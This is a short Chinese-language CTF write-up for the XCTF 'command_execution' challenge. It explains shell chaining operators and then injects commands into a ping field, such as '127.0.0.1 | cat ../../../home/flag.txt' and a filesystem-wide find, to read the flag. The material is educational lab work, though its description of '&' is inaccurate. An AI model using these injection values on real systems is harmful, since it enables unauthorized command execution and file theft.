XCTF command_execution
一.使用命令拼接的方式来执行其它命令
1.了解 | , & , && , 和 ||
windows或linux下:command1 && command2 先执行command1,如果为真,再执行command2。
command1 | command2 只执行command2。
command1 & command2 先执行command2后执行command1。
command1 || command2 先执行command1,如果为假,再执行command2
二.实验步骤
1.输入 127.0.0.1
发现确实返回了ping的结果,我们试着命令拼接看能不能成功,输入 127.0.0.1 | ls ../ ,发现html这个文件夹
继续输入 127.0.0.1 | ls ../../ , 出现了更多的文件,但似乎没有flag相关的
再输入 127.0.0.1 | ls ../../../
发现 home ,试着进入home里看看能不能收获点什么
果然发现flag文件,通过 输入 127.0.0.1 | cat ../../../home/flag.txt , 得到flag
当然这里我们可以直接采用 127.0.0.1 | find / -name "flag*" ,得到flag.txt。
趁着年轻,多学些